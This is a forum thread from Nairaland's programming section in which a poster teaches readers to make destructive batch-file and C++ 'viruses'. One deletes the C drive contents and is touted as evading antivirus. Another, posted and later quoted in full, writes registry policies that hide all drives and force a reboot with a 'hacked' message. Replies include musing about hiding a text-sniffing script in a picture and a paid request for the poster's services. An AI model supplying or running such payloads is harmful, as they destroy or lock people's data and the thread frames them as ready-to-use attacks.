Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,151,628 members, 7,813,074 topics. Date: Tuesday, 30 April 2024 at 06:27 AM

Create A Virus In Less Than 60seconds - Programming - Nairaland

Nairaland Forum / Science/Technology / Programming / Create A Virus In Less Than 60seconds (1881 Views)

Create Your First Virus / How Can I Create A Virus Or Malware? / Please How Do I Remove Shortcut Virus On My Android. (2) (3) (4)

(1) (Reply) (Go Down)

Create A Virus In Less Than 60seconds by smobnology(m): 10:13pm On Jul 14, 2015
Everybody knows what a virus is. A person using a
computer or laptop has faced a virus attack atleast
once in their life. Viruses are all man made. In this
post i will teach you to make simple yet very powerful
or you can say dangerous computer virus using a
batch file. No software is required to make this virus,
Notepad is enough for it. The good thing about this
virus is it is not detected by any AntiVirus (depends
on your antivirus actually ).
What will this virus do ?
You will create this virus using batch file
programming. This virus will delete the C Drive
completely. The good thing about this virus is that it
is not detected by antivirus.
www.smobnology.com/2015/06/create-virus-in-less-than-60-seconds.html?m=0
How to Make the virus ?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be
anything but .bat is must)
3. Now, running this file will delete all the content of
C Drive.Warning: Please don’t try to run on your own
computer or else it will delete all the content of your
C Drive. I will not be responsible for any damage
done to your computer. www.smobnology.com/2015/06/create-virus-in-less-than-60-seconds.html?m=0
www.smobnology.com/2015/06/create-virus-in-less-than-60-seconds.html?m=0
Re: Create A Virus In Less Than 60seconds by feldido(m): 10:16pm On Jul 14, 2015
Old school

2 Likes

Re: Create A Virus In Less Than 60seconds by FincoApps(m): 4:57am On Jul 15, 2015
It doesn't seem like it would do exactly that. Too many admin stuff in C drive and stuff that wasn't created by that user. Additionally, Too much open stuff. Not sure though so orrect me if I'm wrong. If I am, I'll personally try it on my laptop

1 Like

Re: Create A Virus In Less Than 60seconds by seunthomas: 7:50am On Jul 15, 2015
feldido:
Old school
You are very right. Its very old school. Viruses today dont even delete anything. Most times they just hide and steal information from your system.
Re: Create A Virus In Less Than 60seconds by seunthomas: 7:52am On Jul 15, 2015
FincoApps:
It doesn't seem like it would do exactly that. Too many admin stuff in C drive and stuff that wasn't created by that user. Additionally, Too much open stuff. Not sure though so orrect me if I'm wrong. If I am, I'll personally try it on my laptop
Dont try it bro. It may actually delete your files if you are administrator. Some files may not delete like core operation stuff because their process is probably running.

1 Like

Re: Create A Virus In Less Than 60seconds by smobnology(m): 8:09am On Jul 15, 2015
Smile...virus today don't delect anything again ba?..ayam hear u ooo
Re: Create A Virus In Less Than 60seconds by smobnology(m): 8:16am On Jul 15, 2015
www.smobnology.com/2015/06/create-virus-that-disable-all-hard-disks.html?m=0 Create a Virus That Disable All Hard Disks
In our previous posts we have taught you to make batch file virus. Now we will teach you to make a virus which will disable all the hard disks of your computer using C++ as well as batch file. Firstly I will give you a c++ program. As everyone isn’t aware of how to run C++ program. So for them I will give the same program in batch file. Copy the code in notepad.Save it as virus.bat.Run the batch file.Basic concept is same. WARNING: RUN AT YOUR OWN RISK. C++ 1. Open any c++ editor. 2. Copy and paste the following code. #include < windows.h > #include < fstream.h > #include < iostream.h > #include < string.h > #include < conio.h >int main() { ofstream write ( “C:\\WINDOWS\\system32\\DisableHDD.bat” ); / *opening or creating new file with .bat extension*/ write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVer sion\\policies\\Explorer / v NoDrives /t REG_DWORD /d 12\n”; write << “REG ADD HKEY_LOCAL_MACHINE \\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n”; write<<“shutdown -r -c \”Sorry Your System is hacked by us!\” -f”<<“\n”; write.close(); //close file ShellExecute(NULL,”open”,”C:\\WINDOWS \\system32\\DisableHDD.bat”,NULL,NULL,SW_ SHOWNORMAL); return 0; } 3. Compile and run the program. BATCH FILE VERSION Below batch file contains the code that performs the similar job. 1. Open a notepad. 2. Copy and paste the following code. REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE \\Microsoft\\Windows\\CurrentVer sion\\policies \\Explorer /v NoDrives /t REG_DWORD /d 12\nREG ADD HKEY_LOCAL_MACHINE\\SOFTWARE \\Microsoft\\Windows\\CurrentVer sion\\policies \\Explorer /v NoViewonDrive /t REG_DWORD /d 12\nshutdown -r -c \”Hahahhaha! Your system is hacked by TTH!\” -f 3. Save it as “DisableHDD.bat”. 4. Double click the batch file to activate the virus. WARNING: For educational purpose only. Run the virus at YOUR OWN RISK. www.smobnology.com/2015/06/create-virus-that-disable-all-hard-disks.html?m=0
Re: Create A Virus In Less Than 60seconds by FincoApps(m): 10:18am On Jul 15, 2015
Of course what I meant is create a folder, create files in the folder, open the files, point the virus to that folder and see if it would delete open files.
seunthomas:

Dont try it bro. It may actually delete your files if you are administrator. Some files may not delete like core operation stuff because their process is probably running.
Re: Create A Virus In Less Than 60seconds by Nobody: 5:38pm On Jul 15, 2015
seunthomas:

You are very right. Its very old school. Viruses today dont even delete anything. Most times they just hide and steal information from your system.

The op had just showed people how to write a simple program.
He did not show how to attract or the trick he will use in whic users will come across the virus for eventual damage of their systems.

For me even though I only do ethical hacking. I would prefer to write a born again script e.g for sniffing text messages and embed in a sexy picture, whereas every one that open such picture becomes my pray.And since bash is popular,i may just write it in Korne which is not too knwn by people.Hahaha

1 Like

Re: Create A Virus In Less Than 60seconds by Borndead(f): 11:18pm On Apr 30, 2020
Op, please we need to talk. I need tour service for something urgent and I’m willing to pay for it. Please message me on 08162187635. Thank you






smobnology:
www.smobnology.com/2015/06/create-virus-that-disable-all-hard-disks.html?m=0
Create a Virus That Disable All
Hard Disks

In our previous posts we have taught you to
make batch file virus. Now we will teach you to
make a virus which will disable all the hard disks
of your computer using C++ as well as batch file.
Firstly I will give you a c++ program. As everyone
isn’t aware of how to run C++ program. So for
them I will give the same program in batch file.
Copy the code in notepad.Save it as virus.bat.Run
the batch file.Basic concept is same.
WARNING: RUN AT YOUR OWN RISK.
C++
1. Open any c++ editor.
2. Copy and paste the following code.
#include < windows.h > #include < fstream.h >
#include < iostream.h > #include < string.h >
#include < conio.h >int main() { ofstream write
( “C:\\WINDOWS\\system32\\DisableHDD.bat” ); /
*opening or creating new file with .bat
extension*/ write << “REG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft
\\Windows\\CurrentVer sion\\policies\\Explorer /
v NoDrives /t REG_DWORD /d 12\n”;
write << “REG ADD HKEY_LOCAL_MACHINE
\\SOFTWARE\\Microsoft\\Windows\\CurrentVer
sion\\policies\\Explorer /v NoViewonDrive /t
REG_DWORD /d 12\n”;
write<<“shutdown -r -c \”Sorry Your System is
hacked by us!\” -f”<<“\n”;
write.close(); //close file
ShellExecute(NULL,”open”,”C:\\WINDOWS
\\system32\\DisableHDD.bat”,NULL,NULL,SW_
SHOWNORMAL);
return 0;
}
3. Compile and run the program.
BATCH FILE VERSION
Below batch file contains the code that performs
the similar job.
1. Open a notepad.
2. Copy and paste the following code.
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE
\\Microsoft\\Windows\\CurrentVer sion\\policies
\\Explorer /v NoDrives /t REG_DWORD /d 12\nREG
ADD HKEY_LOCAL_MACHINE\\SOFTWARE
\\Microsoft\\Windows\\CurrentVer sion\\policies
\\Explorer /v NoViewonDrive /t REG_DWORD /d
12\nshutdown -r -c \”Hahahhaha! Your system is
hacked by TTH!\” -f 3. Save it as
“DisableHDD.bat”.
4. Double click the batch file to activate the virus.
WARNING: For educational purpose only. Run the
virus at YOUR OWN RISK.
www.smobnology.com/2015/06/create-virus-that-disable-all-hard-disks.html?m=0

(1) (Reply)

Phpbrowserbox Goes Open-source! / Gbedion : Social Crowdfunding For Africans / Let's Create An E-learning Site/App Together!!!

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 27
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.